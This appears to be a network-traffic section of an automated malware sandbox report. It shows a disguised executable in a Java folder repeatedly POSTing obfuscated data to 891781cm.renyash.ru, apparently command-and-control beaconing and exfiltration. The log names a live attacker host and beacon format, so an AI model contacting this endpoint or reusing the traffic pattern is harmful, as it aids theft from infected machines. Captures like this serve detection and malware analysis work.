                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zcTN614DNct%2B6%2FwILrmSARmGc%2BBVPCcEbjq6pVJscph28N5mH8rWG78ira0wQ1k06ijIOehkvQCTZ%2F0ViXaRid5tA5iHNaybVCKEQhgMaXLQZoRmbPZVNPtBg%2BVwJTPULzgdOZjt"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30bb7bc5c5e74-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4445&min_rtt=2280&rtt_var=5185&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2136&delivery_rate=74482&cwnd=111&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 03 1e 21 0d 24 28 33 14 2b 2e 36 5b 38 2c 2f 54 24 3f 3d 04 33 09 30 5a 25 3d 3a 01 2d 16 30 59 3e 3b 01 12 26 5c 29 13 20 32 35 00 25 0c 2e 5d 04 1d 25 10 3f 29 2e 58 3c 11 32 00 3e 31 23 04 26 37 34 05 25 0a 0a 5b 30 3d 21 04 20 31 24 0b 30 20 2c 56 2b 2a 3c 06 27 03 26 1c 23 3a 2e 57 0d 12 22 1d 24 2e 35 53 3e 57 20 1e 22 02 3f 57 27 2f 34 08 27 3c 30 57 37 06 26 1d 29 11 0e 5d 21 27 2d 1c 24 2a 38 07 35 39 2e 01 36 33 22 54 20 03 2f 54 05 3d 56 4f 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98!$(3+.6[8,/T$?=30Z%=:-0Y>;&\) 25%.]%?).X<2>1#&74%[0=! 1$0 ,V+*<'&#:.W"$.5S>W "?W'/4'<0W7&)]!'-$*859.63"T /T=VO0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49734 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 15:02:12.691539049 CET | 320 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 15:02:13.040324926 CET1072OUTData Raw: 55 52 5d 54 5a 5f 51 55 55 5a 54 59 51 5a 55 53 58 59 5c 5e 59 50 52 52 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UR]TZ_QUUZTYQZUSXY\^YPRR][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ (!8-26=7_$42V:,0>038-;?>0U)<#^!'^)#
Jan 1, 2025 15:02:13.135201931 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 15:02:13.398500919 CET | 811 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:13 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9pitw%2FEtdAKxsjK8F2Zp%2Bkk%2B2L%2BkfkG69aeGyT0ljxEhKsjFKZFVHxrK4y0UvVVib9llI4DLWBiDuAt9jR2PenSMlSseRfreegxQphiNp0t1h4LWe0wayr9c%2FS0lJXT%2BgChyceRk"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30bb7cf7043bc-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=8456&min_rtt=1822&rtt_var=13952&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1392&delivery_rate=26593&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49735 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 15:02:13.557497978 CET | 320 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49736 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 15:02:13.972496033 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:02:14.325496912 CET1072OUTData Raw: 55 54 58 55 5a 5a 54 5a 55 5a 54 59 51 5a 55 53 58 53 5c 5e 59 50 52 5c 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UTXUZZTZUZTYQZUSXS\^YPR\][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ Y?[!(-Z25](= 3$=-'%0#Y--(+>0T=#^!'^)#
Jan 1, 2025 15:02:14.416939020 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 15:02:14.692692041 CET | 806 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:14 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pd27AKpVX%2FBtUYj3rWC3BWG2HHxV5HSLAFUEkurOyiaLo2C3gcgiNVBXEsL6lHeBUWDdM%2Fr%2BkNlKMNLZlEJqPBI%2BR3GOkG4rbo7k1LSsjBAo07Iti5YSoptguzKJcRfBfQOu597L"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30bbfdcf47c7e-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1903&min_rtt=1859&rtt_var=785&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=660334&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49738 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 15:02:14.831027985 CET | 320 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 15:02:15.186120033 CET1072OUTData Raw: 50 53 5d 56 5a 5a 51 54 55 5a 54 59 51 58 55 55 58 53 5c 54 59 56 52 5c 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PS]VZZQTUZTYQXUUXS\TYVR\][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#)/5] >%!X)>7Y$9:$?3Y!0;>?><W*<#^!'^)+
Jan 1, 2025 15:02:15.282783031 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 15:02:15.536407948 CET | 808 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:15 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VkKnrRu0eKI%2B1OC9GE3MY80WFuBcHT%2FOcBAnnKjhDYaMt2OUcNiqAU1MYBUXG8J9xpCNgGbGxXJpiydiRI7fnfQjd252vguGhQ%2Bk2S8gXa3%2BH%2Bx78mPYZTB69onGkrldvLWsya8e"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30bc53ecf435d-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3916&min_rtt=1849&rtt_var=4828&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1392&delivery_rate=79399&cwnd=127&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49741 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 15:02:15.638679028 CET | 346 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 159884
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49742 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 15:02:15.686604977 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:02:16.040594101 CET1072OUTData Raw: 55 51 5d 50 5f 59 54 59 55 5a 54 59 51 5e 55 52 58 5d 5c 55 59 51 52 5f 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UQ]P_YTYUZTYQ^URX]\UYQR_][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#(/>!+.%\)($-X%?!'#Y8>$_?=4S*#^!'^)3
Jan 1, 2025 15:02:16.160638094 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 15:02:16.421458960 CET | 809 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:16 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9LUvxpzy29HbaaJ%2FxowuLqTnpVjwfOMmjV9o%2BJwLsbJWax1e8ckxXTlpkEgna9Dm278xp65H3OC9Ky8%2FWmYounRf%2BKDhRsNhE81EbhrBwWCooba6W6LXFbktJsKRsEE1%2F3m2ITEs"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30bcabff443b7-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=10061&min_rtt=8916&rtt_var=5634&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=80747&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  8 | 192.168.2.4 | 49745 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 15:02:16.560880899 CET | 320 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 15:02:16.915397882 CET | 1072 | OUT | Data Raw: 55 5f 58 50 5f 5a 51 58 55 5a 54 59 51 5f 55 50 58 5f 5c 5d 59 57 52 5f 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: U_XP_ZQXUZTYQ_UPX_\]YWR_][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ <71X$>(.3$U97'"'/<,> ]<.$W><#^!'^)7
                                                                                                                  Jan 1, 2025 15:02:17.023051023 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:17.270081997 CET | 807 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:17 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wfVyEqTyFDm0GHZJ6ZP4%2FcuO6wWfMQ8AcK4GsM%2FEIc3LpZFjDBB%2FE7MJhvvhCVU7ssgpTp1Ey0he0LcutzGHIvNKuEtXtZyDZbfDPXQc6zxDNVRmzK1%2B2rZPBQVNZN1Dy3UGtP3t"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30bd01870de98-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3079&min_rtt=1469&rtt_var=3772&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1392&delivery_rate=101699&cwnd=211&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  9 | 192.168.2.4 | 49748 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 15:02:17.407289028 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:02:17.760162115 CET | 1072 | OUT | Data Raw: 55 5e 5d 56 5a 58 54 59 55 5a 54 59 51 59 55 57 58 53 5c 59 59 57 52 5b 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: U^]VZXTYUZTYQYUWXS\YYWR[][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ X?64_&X5=,'"V-$1&,<,X ]<>#^!'^)/
                                                                                                                  Jan 1, 2025 15:02:17.867383957 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:18.122817039 CET | 813 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:18 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=knAnz8QKx%2BfZUte7eu%2F2LR6yRkfhLEghy7iDISQqMnNKovcFkfeCZwNOlqcHQnsiGqT%2F8HCcAx%2BhA4m65P74iXIKM%2B3Y8vyAg5R6VntOXMiQ8OLpTncPOWL%2BleEdCEDCA%2FDFEHjj"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30bd56a9f183d-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2781&min_rtt=1486&rtt_var=3148&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=123206&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  10 | 192.168.2.4 | 49751 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 15:02:18.595827103 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1796
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  11 | 192.168.2.4 | 49752 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 15:02:18.641189098 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:02:18.993779898 CET | 1072 | OUT | Data Raw: 55 53 5d 50 5f 5c 51 5a 55 5a 54 59 51 5f 55 56 58 52 5c 5b 59 55 52 58 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: US]P_\QZUZTYQ_UVXR\[YURX][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ ?* 1!\>+'B!:'310Z,/7(>'=#^!'^)7
                                                                                                                  Jan 1, 2025 15:02:19.084362984 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:19.353039980 CET | 806 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:19 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=43PlzUc%2BZcziSzMFRSztFqasOyczDaJhBAzaSlCIys0fim0WqtzbaogYNnwblc8leXuMH6fh3nvIgEW4%2F5%2FHVjKU1oe5xH6O2H0Nh9NdvlI9pWaidDsL12CZKRpOGINyO%2BOITWhV"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30bdcfd3c19cb-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2104&min_rtt=2025&rtt_var=917&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=549285&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  12 | 192.168.2.4 | 49753 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 15:02:19.498711109 CET | 320 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 15:02:19.853215933 CET | 1072 | OUT | Data Raw: 50 52 5d 57 5f 5c 51 55 55 5a 54 59 51 52 55 53 58 5a 5c 5b 59 5d 52 5f 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PR]W_\QUUZTYQRUSXZ\[Y]R_][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ X?2 +&.Z(=30$..$_3?.'/3^;=;<=8T(,#^!'^)
                                                                                                                  Jan 1, 2025 15:02:19.963844061 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:20.223815918 CET | 809 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:20 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
